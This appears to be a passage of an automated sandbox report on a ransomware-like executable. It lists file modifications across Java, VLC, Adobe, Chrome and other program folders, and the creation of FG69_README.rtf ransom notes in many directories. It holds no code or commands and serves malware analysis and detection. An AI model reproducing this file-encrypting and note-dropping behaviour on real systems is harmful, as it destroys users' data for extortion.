d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-editor-mimelookup-impl_zh_CN.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\images\Other-48.png d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Choibalsan d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\THIRDPARTYLICENSEREADME-JAVAFX.txt d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Berlin d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-masterfs_zh_CN.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Dawson d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\lib\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.launcher.win32.win32.x86_64.nl_ja_4.4.0.v20140623020002.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.ibm.icu_52.1.0.v201404241930.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\winXPHandle.png d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-favorites_zh_CN.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-core-windows_ja.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\META-INF\eclipse.inf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Gibraltar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-explorer_ja.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Fiji d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Helsinki d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\brx\LC_MESSAGES\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\com.jrockit.mc.rjmx.syntheticnotification.exsd d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Merida d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Africa\Ceuta d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT-14 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\ended_review_or_form.gif d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\VideoLAN\VLC\lua\http\requests\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\Dialog.zip d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-core-io-ui_ja.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-coredump.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\Workflow.VisualBasic.Targets d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Beirut d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.simpleconfigurator.manipulator_2.0.0.v20131217-1203.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt55.ths d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib\locale\org-openide-modules_zh_CN.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Tehran d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ui.sdk.scheduler.nl_zh_4.4.0.v20140623020002.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-profiler_zh_CN.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1258.TXT d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\skins\default.vlt d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\icudtl.dat d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Matamoros d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Chita d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Brunei d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Magadan d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Australia\Sydney d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\license.html d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-openide-execution.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\fonts\LucidaBrightRegular.ttf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\calendars.properties d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_ja_4.4.0.v20140623020002\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm\PMP\QRCode.pmp d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Java\jre7\lib\zi\SystemV\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\kn\LC_MESSAGES\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Noronha d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\META-INF\MANIFEST.MF d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\bin\dblook d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroBroker.exe d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\mn\LC_MESSAGES\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\Workflow.Targets d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Argentina\Tucuman d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\images\cursors\invalid32x32.gif d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Mozilla Firefox\pingsender.exe d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Belize d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\El_Aaiun d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT-9 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\license.html d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Tegucigalpa d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Kamchatka d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Wake d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-Bold.otf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Malta d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\El_Salvador d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.databinding.beans_1.2.200.v20140214-0004.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Indiana\Indianapolis d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ckb\LC_MESSAGES\vlc.mo d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\mobile_view.html d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Mozilla Firefox\dependentlibs.list d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\VideoLAN\VLC\plugins\access\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\cmm\sRGB.pf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\winClassicTSFrame.png d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-swing-outline_zh_CN.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Efate d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\pa\LC_MESSAGES\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\psfont.properties.ja d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\El_Salvador d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.simpleconfigurator_1.1.0.v20131217-1203.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\jmc.exe d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.flightrecorder.controlpanel.ui.zh_CN_5.5.0.165303.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\zu\LC_MESSAGES\vlc.mo d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\VDKHome\ENU\VDK10.STP d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\MakeAccessible.api d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\security\blacklist d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\ks_IN\LC_MESSAGES\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\jstatd.exe d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\bin\javacpl.cpl d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\84.0.4147.89\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Damascus d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-threaddump_zh_CN.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\fonts\LucidaTypewriterBold.ttf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Atlantic\Azores d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.common_2.10.1.v20140901-1043\META-INF\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Wake d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-windows_ja.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Fortaleza d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Dili d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\dragHandle.png d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.help.ui_4.0.100.v20140401-0608.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\it.pak d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\VideoLAN\VLC\hrtfs\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\mobile.css d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\fonts\LucidaBrightItalic.ttf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench.addons.swt.nl_ja_4.4.0.v20140623020002.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\resources.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-spi-quicksearch_ja.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification.ja_5.5.0.165303.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.net_1.2.200.v20140124-2013.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.garbagecollector.nl_zh_4.4.0.v20140623020002.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib\nbexec.exe d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\lib\pop3.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-keyring-impl_ja.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-masterfs.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\en-US.pak d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.http.jetty_3.0.200.v20131021-1843.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.css.swt.theme_0.9.300.v20140424-2042.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Anadyr d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\winXPBluHandle.png d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\ach\LC_MESSAGES\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.core.feature_1.3.0.v20140523-0116\feature.properties d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Indian\Cocos d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.contenttype_3.4.200.v20140207-1251.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Microsoft Analysis Services\AS OLEDB\10\Cartridges\msjet.xsl d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Javascripts\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\cs\LC_MESSAGES\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\jrunscript.exe d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ecf.filetransfer_5.0.0.v20140827-1444.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-core-kit_zh_CN.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.sat4j.core_2.3.5.v201308161310.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Goose_Bay d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_zh_4.4.0.v20140623020002\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-application-views_zh_CN.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.core.feature_1.3.0.v20140523-0116\license.html d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program 